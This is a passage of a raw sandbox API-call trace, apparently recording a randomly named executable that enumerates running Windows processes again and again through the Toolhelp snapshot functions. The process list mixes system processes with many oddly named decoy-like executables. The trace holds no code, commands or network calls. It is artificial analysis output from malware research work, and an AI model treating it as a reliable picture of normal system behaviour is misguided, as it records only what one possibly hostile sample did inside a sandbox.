pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.912] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0127.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.919] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0127.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0127.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0127.981] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0127.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0127.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0127.985] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0127.986] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0127.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0127.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0127.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0127.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0127.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0127.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0127.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0127.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0127.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0127.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0127.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.004] CloseHandle (hObject=0xc4) returned 1 [0128.004] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.009] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0128.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0128.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0128.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0128.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0128.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0128.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0128.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0128.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0128.126] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0128.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0128.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0128.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0128.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0128.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0128.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0128.136] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0128.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, 